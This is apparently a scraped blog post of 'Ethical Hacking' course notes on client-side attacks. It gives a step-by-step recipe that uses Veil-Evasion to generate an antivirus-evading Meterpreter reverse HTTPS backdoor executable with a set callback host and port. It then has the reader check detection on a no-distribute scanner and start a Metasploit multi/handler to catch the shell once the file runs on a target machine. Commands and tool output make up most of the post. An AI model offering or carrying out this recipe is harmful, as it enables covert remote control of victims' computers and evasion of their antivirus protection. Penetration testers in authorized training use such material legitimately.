zoukankan      html  css  js  c++  java
  • Ethical Hacking

    CLIENT SIDE ATTACKS - Backdooring exe' s

    Download an executable file first.

    VEIL - FRAMEWORK

    A backdoor is a file that gives us full control over the machine that it gets executed on.

    Backdoors can be caught by Anti-Virus programs.

    Veil is a framework for generating Undetectable backdoors.

    1. Run veil

    veil

     Select tool 1 - Evasion.

    2. List payloads and Select one

    Veil/Evasion>: list
    ===============================================================================
                                       Veil-Evasion
    ===============================================================================
          [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================
    
    
     [*] Available Payloads:
    
        1)    autoit/shellcode_inject/flat.py
    
        2)    auxiliary/coldwar_wrapper.py
        3)    auxiliary/macro_converter.py
        4)    auxiliary/pyinstaller_wrapper.py
    
        5)    c/meterpreter/rev_http.py
        6)    c/meterpreter/rev_http_service.py
        7)    c/meterpreter/rev_tcp.py
        8)    c/meterpreter/rev_tcp_service.py
    
        9)    cs/meterpreter/rev_http.py
        10)    cs/meterpreter/rev_https.py
        11)    cs/meterpreter/rev_tcp.py
        12)    cs/shellcode_inject/base64.py
        13)    cs/shellcode_inject/virtual.py
    
        14)    go/meterpreter/rev_http.py
        15)    go/meterpreter/rev_https.py
        16)    go/meterpreter/rev_tcp.py
        17)    go/shellcode_inject/virtual.py
    
        18)    lua/shellcode_inject/flat.py
    
        19)    perl/shellcode_inject/flat.py
    
        20)    powershell/meterpreter/rev_http.py
        21)    powershell/meterpreter/rev_https.py
        22)    powershell/meterpreter/rev_tcp.py
        23)    powershell/shellcode_inject/psexec_virtual.py
        24)    powershell/shellcode_inject/virtual.py
    
        25)    python/meterpreter/bind_tcp.py
        26)    python/meterpreter/rev_http.py
        27)    python/meterpreter/rev_https.py
        28)    python/meterpreter/rev_tcp.py
        29)    python/shellcode_inject/aes_encrypt.py
        30)    python/shellcode_inject/arc_encrypt.py
        31)    python/shellcode_inject/base64_substitution.py
        32)    python/shellcode_inject/des_encrypt.py
        33)    python/shellcode_inject/flat.py
        34)    python/shellcode_inject/letter_substitution.py
        35)    python/shellcode_inject/pidinject.py
        36)    python/shellcode_inject/stallion.py
    
        37)    ruby/meterpreter/rev_http.py
        38)    ruby/meterpreter/rev_https.py
        39)    ruby/meterpreter/rev_tcp.py
        40)    ruby/shellcode_inject/base64.py
        41)    ruby/shellcode_inject/flat.py

    3. Generating an undetectable backdoor using Veil 3

    use go/meterpreter/rev_https.py

    set LHOST 10.0.0.15
    set LPORT 8080
    set PROCESSORS 1
    set SLEEP 6

    4. Generate backdoor

    generate

     

    Scan the file through https://nodistribute.com/.

    Run hander

    1. Run Metasploit

    msfconsole

    2. Use the handler module.

    use exploit/multi/handler

    3. Set payload

    set PAYLOAD [veil payload]

    4. Set IP

    set LHOST [your IP]

    5. Set port

    set LPORT [veil port]

    6. exploit

    exploit

    Run the backdoor file on the target machine sucessfully.

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    【洛谷3527】[POI2011] MET-Meteors(树状数组+整体二分)
    【洛谷1580】yyy loves Easter_Egg I(字符串处理题)
    【BZOJ4866】[YNOI2017] 由乃的商场之旅(莫队)
    【BZOJ4810】[YNOI2017] 由乃的玉米田(莫队+bitset)
    【洛谷1494】[国家集训队] 小Z的袜子(莫队)
    【BZOJ3668】[NOI2014] 起床困难综合症(位运算思想)
    【BZOJ3720】Gty的妹子树(主席树+时间分块)
    【BZOJ2427】[HAOI2010] 软件安装(缩点+树形DP)
    【洛谷3648】[APIO2014] 序列分割(斜率优化DP)
    动态规划专题(五)——斜率优化DP
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/12240398.html
Copyright © 2011-2022 走看看